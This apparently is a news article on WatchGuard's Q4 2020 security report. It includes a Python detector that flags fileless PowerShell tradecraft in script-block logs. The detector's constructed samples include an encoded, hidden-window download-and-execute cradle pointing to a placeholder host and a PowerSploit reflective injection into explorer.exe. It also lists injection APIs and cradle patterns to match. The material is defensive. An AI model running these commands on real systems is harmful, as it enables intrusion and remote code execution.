Fileless malware rates in 2020 increased by 888% over 2019, according to WatchGuard.
One problem with fileless attacks is that they can evade detection by traditional endpoint protection products, which look for malicious files on disk. Another is that all it takes to become a victim is visiting a malicious or compromised web page.
Once the malware is delivered, toolkits such as PowerSploit and Cobalt Strike can be used to inject malicious code into legitimate processes, and the injected code keeps running even if the script that delivered it is detected and removed.
Applying endpoint detection and response alongside regular anti-malware products can help identify these threats.
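The inject-and-persist behaviour described above is exactly what PowerShell script block logging and EDR telemetry are meant to surface. The Python below is an added example, not WatchGuard's code and not a product detection rule: it scores constructed samples of the script text Windows records as event ID 4104 for PowerSploit function names, the Win32 calls in-memory injection relies on, download cradles and hidden-window launches, and it decodes any -EncodedCommand argument (base64 over UTF-16LE, not UTF-8) before matching so that encoding alone cannot hide a cradle. The sample events, indicator list and weights are this example's own assumptions.

```python
"""Flag fileless PowerShell tradecraft in script-block log text.

Added example (not WatchGuard's code, not a product rule). It runs over
constructed samples of the script text Windows records as event ID 4104
when PowerShell script block logging is enabled; SAMPLE_EVENTS, the
indicator list and the weights are this example's own choices.
"""
import base64
import re

# Indicator name, weight, pattern.  PowerSploit function names and the
# Win32 calls that process injection relies on weigh more than generic
# signs of obfuscation, which also appear in legitimate admin scripts.
INDICATORS = [
    ("powersploit_reflective_injection", 3, re.compile(r"Invoke-ReflectivePEInjection", re.I)),
    ("powersploit_shellcode", 3, re.compile(r"Invoke-Shellcode", re.I)),
    ("win32_injection_api", 2,
     re.compile(r"\b(?:VirtualAlloc(?:Ex)?|WriteProcessMemory|CreateRemoteThread)\b", re.I)),
    ("in_memory_assembly_load", 2,
     re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I)),
    ("decode_and_execute", 2,
     re.compile(r"FromBase64String.*?(?:\bIEX\b|Invoke-Expression)"
                r"|(?:\bIEX\b|Invoke-Expression).*?FromBase64String", re.I | re.S)),
    ("download_cradle", 1,
     re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I)),
    ("hidden_window", 1, re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I)),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -en, -enc, ...); this covers the forms seen most often in command lines.
ENCODED_RX = re.compile(r"-e(?:n(?:c(?:odedcommand)?)?|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the plaintext of an -EncodedCommand argument, or None.

    The argument is base64 over UTF-16LE, not UTF-8; decoding it as the
    wrong encoding yields text that no indicator would match.
    """
    m = ENCODED_RX.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad padding, odd byte count
        return None


def encode_command(script):
    """Build an -EncodedCommand argument; used here only to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze(text):
    """Score one script block, searching the decoded payload as well."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = [("encoded_command", 1)] if decoded is not None else []
    hits += [(name, w) for name, w, rx in INDICATORS if rx.search(haystack)]
    return {"indicators": [n for n, _ in hits],
            "score": sum(w for _, w in hits),
            "decoded": decoded}


def scan(events, threshold=2):
    """Return (index, result) for every event scoring at or above threshold."""
    flagged = []
    for i, text in enumerate(events):
        result = analyze(text)
        if result["score"] >= threshold:
            flagged.append((i, result))
    return flagged


# Constructed samples: a benign admin one-liner, a hidden-window encoded
# download cradle, and a PowerSploit injection into explorer.exe.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    r"Get-ChildItem -Path C:\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB }",
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_command(CRADLE),
    "$bytes = [Convert]::FromBase64String($payload); "
    "Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId (Get-Process explorer).Id",
]

if __name__ == "__main__":
    for i, result in scan(SAMPLE_EVENTS):
        print(f"event {i}: score={result['score']} {result['indicators']}")
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

Run as a script it flags the second and third samples and leaves the benign one alone. The weighting matters: a single PowerSploit injection call is enough on its own, while a hidden window or an encoded command only counts when combined with something else, since both show up in legitimate scheduled tasks and management tooling.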
Cryptocurrency prices have trended upwards, and cryptominer malware detections climbed more than 25% in 2020, with 850 unique variants detected during the year.
Double-digit growth was also seen in malware delivered over encrypted connections. In the fourth quarter of 2020, 47% of all attacks WatchGuard detected at the network perimeter arrived over encrypted connections.
A new trojan, Trojan.Script.1026663, evaded email scanners and entered WatchGuard's list of the top five most widespread malware detections in the same period. It arrives as an email asking the victim to review an attached order list; opening the malicious document triggers a chain of payloads that ultimately installs the Agent Tesla remote access trojan (RAT) and keylogger.
Botnet malware targeting IoT devices and routers is a growing problem. The Linux.Generic virus (aka The Moon) entered WatchGuard's list of top 10 malware detections. Its Linux-specific payload built for ARM processors, together with a second payload built for MIPS processors, points squarely at IoT devices: ARM and MIPS are the architectures found in most routers and embedded devices.
Despite some well-publicised cases, ransomware attack volumes shrank for the second year running. The number of unique ransomware payloads also continued to fall, from a record 5,489 in 2018 to 4,131 in 2019 and 2,152 in 2020, though each variant may have infected hundreds or thousands of endpoints worldwide.
Most ransomware detections matched signatures introduced in 2017 to catch WannaCry and related variants.
The decline in volume reflects a shift from scattergun campaigns to highly targeted attacks on victims that are particularly sensitive to downtime, such as healthcare providers and manufacturers.
In Q4 2020, WatchGuard appliances blocked more than 20.6 million malware variants (456 per device) and nearly 3.5 million network threats (77 per appliance).
"The rise in sophisticated, evasive threat tactics last quarter and throughout 2020 showcases how vital it is to implement layered, end-to-end security protections," said WatchGuard CTO Corey Nachreiner.
"The attacks are coming on all fronts, as cyber criminals increasingly leverage fileless malware, cryptominers, encrypted attacks and more, and target users both at remote locations as well as corporate assets behind the traditional network perimeter. Effective security today means prioritising endpoint detection and response, network defences and foundational precautions such as security awareness training and strict patch management."
WatchGuard's Q4 2020 Internet Security Report is available here.